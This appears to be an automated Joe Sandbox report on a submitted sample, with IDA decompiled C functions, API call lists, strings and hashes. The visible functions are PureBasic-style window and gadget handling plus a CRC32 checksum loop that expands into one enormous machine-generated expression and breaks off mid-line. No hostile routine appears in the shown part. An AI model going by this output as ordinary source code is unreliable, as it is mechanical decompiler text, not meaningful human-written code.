                                                                                                                                                  • Opcode ID: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                                                                                                                                  • Instruction ID: eae18f8d58a2e4a3b1d5f4302a4f812a2dd08b0a1b01d317368b01850db83572
                                                                                                                                                  • Opcode Fuzzy Hash: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                                                                                                                                  • Instruction Fuzzy Hash: EDB0127029134056E2100F105E06B003930A304B43F100020F340792D6C7F01040450D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00405D3C(void* __ecx, struct HWND__* _a4) {
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _t9;
                                                                                                                                                  				int _t18;
                                                                                                                                                  
                                                                                                                                                  				if(GetKeyState(9) >= 0 || GetKeyState(0x11) < 0 || GetKeyState(0x10) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					if(GetPropA(_a4, "PB_WindowID") == 0) {
                                                                                                                                                  						goto L8;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t9 =  *((intOrPtr*)(E00406690( *0x40b42c, _t8 - 1) + 8));
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					GetClassNameA(GetFocus(),  &_v12, 5);
                                                                                                                                                  					_push(4);
                                                                                                                                                  					_t18 =  &_v12;
                                                                                                                                                  					_push("Rich");
                                                                                                                                                  					_push(_t18);
                                                                                                                                                  					L00407DF0();
                                                                                                                                                  					if(_t18 != 0 || (SendMessageA(GetFocus(), 0x44e, _t18, _t18) & 0x00000800) != 0) {
                                                                                                                                                  						goto L6;
                                                                                                                                                  					} else {
                                                                                                                                                  						L8:
                                                                                                                                                  						_t9 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t9;
                                                                                                                                                  			}






                                                                                                                                                  0x00405d4e
                                                                                                                                                  0x00405daa
                                                                                                                                                  0x00405dba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dbc
                                                                                                                                                  0x00405dc9
                                                                                                                                                  0x00405dc9
                                                                                                                                                  0x00405d68
                                                                                                                                                  0x00405d77
                                                                                                                                                  0x00405d7d
                                                                                                                                                  0x00405d7f
                                                                                                                                                  0x00405d82
                                                                                                                                                  0x00405d87
                                                                                                                                                  0x00405d88
                                                                                                                                                  0x00405d92
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dce
                                                                                                                                                  0x00405dce
                                                                                                                                                  0x00405dce
                                                                                                                                                  0x00405dce
                                                                                                                                                  0x00405d92
                                                                                                                                                  0x00405dd2

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: State$Focus$ClassMessageNamePropSend_strncoll
                                                                                                                                                  • String ID: PB_WindowID$Rich
                                                                                                                                                  • API String ID: 4045516979-1396934994
                                                                                                                                                  • Opcode ID: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                                                                                                                                  • Instruction ID: 77dc2629d62e80cb4dd25d6b8617fe52c6faf744ad0dfdb0d38b69dd5d3036f9
                                                                                                                                                  • Opcode Fuzzy Hash: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                                                                                                                                  • Instruction Fuzzy Hash: 940125715007286AEE006BA0DD09FAB2F6CEF10744F008037B901F70D6D679A855DAA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                  			E00404714(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                  				long _t14;
                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                  				struct HWND__* _t28;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  
                                                                                                                                                  				_t28 = _a4;
                                                                                                                                                  				_t14 = GetWindowLongA(_t28, 0xfffffff4);
                                                                                                                                                  				_t27 = _t14;
                                                                                                                                                  				if(_t14 == 0xffffffff) {
                                                                                                                                                  					return  *0x40a7b4(_t28, _a8, _a12, _a16);
                                                                                                                                                  				}
                                                                                                                                                  				_t30 = E00406690( *0x40b424, _t27);
                                                                                                                                                  				_a16 = CallWindowProcA( *(_t30 + 0xc), _t28, _a8, _a12, _a16);
                                                                                                                                                  				if(_a8 == 0x82) {
                                                                                                                                                  					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)) + 0xc));
                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                  						 *_t20(_t30);
                                                                                                                                                  					}
                                                                                                                                                  					RemovePropA(_t28, "PB_ID");
                                                                                                                                                  					if(RemovePropA(_t28, "PB_DropAccept") != 0) {
                                                                                                                                                  						 *0x40a878(_t28);
                                                                                                                                                  					}
                                                                                                                                                  					SetWindowLongA(_t28, 0xfffffff4, 0xffffffff);
                                                                                                                                                  					E004066BB( *0x40b424, _t27);
                                                                                                                                                  				}
                                                                                                                                                  				return _a16;
                                                                                                                                                  			}







                                                                                                                                                  0x00404719
                                                                                                                                                  0x0040471f
                                                                                                                                                  0x00404725
                                                                                                                                                  0x0040472a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004047af
                                                                                                                                                  0x0040473c
                                                                                                                                                  0x00404755
                                                                                                                                                  0x00404758
                                                                                                                                                  0x0040475d
                                                                                                                                                  0x00404762
                                                                                                                                                  0x00404765
                                                                                                                                                  0x00404765
                                                                                                                                                  0x00404773
                                                                                                                                                  0x0040477f
                                                                                                                                                  0x00404782
                                                                                                                                                  0x00404782
                                                                                                                                                  0x0040478d
                                                                                                                                                  0x0040479a
                                                                                                                                                  0x0040479a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                                                                                                                                  • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                                                                                                                                  • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                                                                                                                                  • RevokeDragDrop.OLE32(?), ref: 00404782
                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                                                                                                                                  • String ID: PB_DropAccept$PB_ID
                                                                                                                                                  • API String ID: 1182866496-3688647018
                                                                                                                                                  • Opcode ID: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                                                                                                                                  • Instruction ID: 8847c1e44ce66a7f40964fadd5f5e1718d5aefc3fa063d13d1fd232dc2879c57
                                                                                                                                                  • Opcode Fuzzy Hash: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                                                                                                                                  • Instruction Fuzzy Hash: C3118231000205BFCB02AF65DD88D6F3BB9EB867747108236F925722E1C735DC219B6A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E00407E1A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                  				_Unknown_base(*)()* _v8;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  
                                                                                                                                                  				sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b0fc);
                                                                                                                                                  				_t39 = GetPropA(_a4,  &_v60);
                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                  					L12:
                                                                                                                                                  					return  *0x40a7b4(_a4, _a8, _a12, _a16);
                                                                                                                                                  				}
                                                                                                                                                  				_v8 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                                                  				if(_a8 == 0x82) {
                                                                                                                                                  					_t30 = E0040642D( *0x40b428);
                                                                                                                                                  					if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
                                                                                                                                                  						_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))));
                                                                                                                                                  					} else {
                                                                                                                                                  						_t38 =  *_t30;
                                                                                                                                                  					}
                                                                                                                                                  					if( *_t39 == _t38) {
                                                                                                                                                  						 *_t30 = 0;
                                                                                                                                                  						 *((intOrPtr*)(_t30 + 0x10)) = 0;
                                                                                                                                                  					}
                                                                                                                                                  					_t31 =  *(_t39 + 8);
                                                                                                                                                  					if(_t31 != 0) {
                                                                                                                                                  						HeapFree( *0x40b0f8, 0, _t31);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree( *0x40b0f8, 0, _t39);
                                                                                                                                                  					RemovePropA(_a4,  &_v60);
                                                                                                                                                  				}
                                                                                                                                                  				if(_v8 == 0) {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				} else {
                                                                                                                                                  					return CallWindowProcA(_v8, _a4, _a8, _a12, _a16);
                                                                                                                                                  				}
                                                                                                                                                  			}









                                                                                                                                                  0x00407e31
                                                                                                                                                  0x00407e46
                                                                                                                                                  0x00407e4c
                                                                                                                                                  0x00407ecb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ed7
                                                                                                                                                  0x00407e58
                                                                                                                                                  0x00407e5b
                                                                                                                                                  0x00407e63
                                                                                                                                                  0x00407e6b
                                                                                                                                                  0x00407e74
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e6d
                                                                                                                                                  0x00407e78
                                                                                                                                                  0x00407e7a
                                                                                                                                                  0x00407e7c
                                                                                                                                                  0x00407e7c
                                                                                                                                                  0x00407e7f
                                                                                                                                                  0x00407e8b
                                                                                                                                                  0x00407e95
                                                                                                                                                  0x00407e95
                                                                                                                                                  0x00407e9f
                                                                                                                                                  0x00407ea8
                                                                                                                                                  0x00407eae
                                                                                                                                                  0x00407eb2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407eb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407ec3

                                                                                                                                                  APIs
                                                                                                                                                  • sprintf.MSVCRT ref: 00407E31
                                                                                                                                                  • GetPropA.USER32(?,?), ref: 00407E40
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 00407EA8
                                                                                                                                                  • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                                                                                                                                  • String ID: PB_GadgetStack_%i
                                                                                                                                                  • API String ID: 1062891511-1190326050
                                                                                                                                                  • Opcode ID: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                                                                                                                                  • Instruction ID: cf438cc818e644c30d8d6d7832dcf279f56c8c30dc3acf8a1c3538aaa767c57c
                                                                                                                                                  • Opcode Fuzzy Hash: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                                                                                                                                  • Instruction Fuzzy Hash: 2E21397290020AFFCF119F50ED44CAA7B7AFB54344B00807AF905A6270D735AD61EB9A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004056EF: GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                                                                                                                                    • Part of subcall function 004056EF: GetParent.USER32(?), ref: 00405746
                                                                                                                                                  • GetPropA.USER32(?,PB_MDI_Gadget), ref: 00405B47
                                                                                                                                                  • DefFrameProcA.USER32(?,00000000,?,?,?), ref: 00405B88
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00405B92
                                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405BA8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Prop$ErrorFrameLastNtdllParentProcProc_Window
                                                                                                                                                  • String ID: PB_MDI_Gadget
                                                                                                                                                  • API String ID: 1329112550-983833826
                                                                                                                                                  • Opcode ID: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                                                                                                                                  • Instruction ID: ade2ebb50fd92f58ae0ad3d0689d10ea9bcfa41fb33ca2ed9d154264829cb94a
                                                                                                                                                  • Opcode Fuzzy Hash: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                                                                                                                                  • Instruction Fuzzy Hash: 8F111872901619AFDB209E449D88EBF7A7CEB45751F010037F915B22818778BC61DAAA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406960() {
                                                                                                                                                  				CHAR* _t32;
                                                                                                                                                  				void* _t36;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				signed char* _t42;
                                                                                                                                                  				signed char* _t43;
                                                                                                                                                  				signed char* _t44;
                                                                                                                                                  				signed char* _t45;
                                                                                                                                                  				signed char* _t46;
                                                                                                                                                  				signed char* _t47;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				signed int _t94;
                                                                                                                                                  				unsigned int _t97;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  				unsigned int _t100;
                                                                                                                                                  				signed int _t102;
                                                                                                                                                  				signed int _t103;
                                                                                                                                                  				void* _t106;
                                                                                                                                                  				unsigned int _t109;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  
                                                                                                                                                  				_t32 =  *(_t110 + 4);
                                                                                                                                                  				_t103 = _t102 | 0xffffffff;
                                                                                                                                                  				if(_t32 != 0) {
                                                                                                                                                  					_t50 = CreateFileA(_t32, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                                                  					 *(_t110 + 8) = _t50;
                                                                                                                                                  					if(_t50 != 0xffffffff) {
                                                                                                                                                  						_t36 =  *0x40b0f8; // 0x2040000
                                                                                                                                                  						_t106 = RtlAllocateHeap(_t36, 0, 0x1000);
                                                                                                                                                  						 *(_t110 + 0x10) = _t106;
                                                                                                                                                  						if(_t106 != 0) {
                                                                                                                                                  							do {
                                                                                                                                                  								ReadFile(_t50, _t106, 0x1000, _t110 + 0x20, 0);
                                                                                                                                                  								_t97 =  *(_t110 + 0x1c);
                                                                                                                                                  								_t40 = _t106;
                                                                                                                                                  								_t100 = _t97;
                                                                                                                                                  								if(_t97 >= 8) {
                                                                                                                                                  									_t109 = _t97 >> 3;
                                                                                                                                                  									do {
                                                                                                                                                  										_t42 = _t40 + 1;
                                                                                                                                                  										_t43 =  &(_t42[1]);
                                                                                                                                                  										_t44 =  &(_t43[1]);
                                                                                                                                                  										_t45 =  &(_t44[1]);
                                                                                                                                                  										_t46 =  &(_t45[1]);
                                                                                                                                                  										_t47 =  &(_t46[1]);
                                                                                                                                                  										_t94 = ((((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t46[1] & 0x000000ff ^ (((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 